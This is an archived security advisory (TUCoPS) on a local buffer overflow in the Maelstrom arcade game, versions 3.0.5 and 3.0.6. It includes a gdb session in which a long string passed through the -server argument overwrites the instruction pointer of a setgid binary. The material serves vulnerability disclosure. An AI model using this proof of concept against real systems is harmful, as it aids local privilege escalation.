TUCoPS :: Linux :: Apps A-M :: bt215.txt

Maelstrom Buffer Overflow




Maelstrom is an arcade game. There is a buffer overflow vulnerability in 

Maelstrom which allow local attacker 

arbitrary code execution.



Vulnerable systems: Maelstrom 3.0.6

		    Maelstrom 3.0.5



Example:

 

[lucae@linux]$ gdb /usr/bin/Maelstrom 



GNU gdb 5.2.1-2mdk (Mandrake Linux)

Copyright 2002 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you 

are

welcome to change it and/or distribute copies of it under certain 

conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "i586-mandrake-linux-gnu"...



(gdb) set args -server 2@`perl -e 'print "ABCD" x 9999'`

(gdb) r



Starting program: /usr/bin/Maelstrom -server 2@`perl -e 'print "ABCD" x 

9999'`

Couldn't resolve host name for ABCDABC......ABCD



Program received signal SIGSEGV, Segmentation fault.

0x41444342 in ?? ()



(gdb) Quit







Note: -rwxr-sr-x    1 root     games      171568 19 feb 

03:38 /usr/bin/Maelstrom   in Linux Professional 9.0







Luca Ercoli luca.ercoli@inwind.it

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH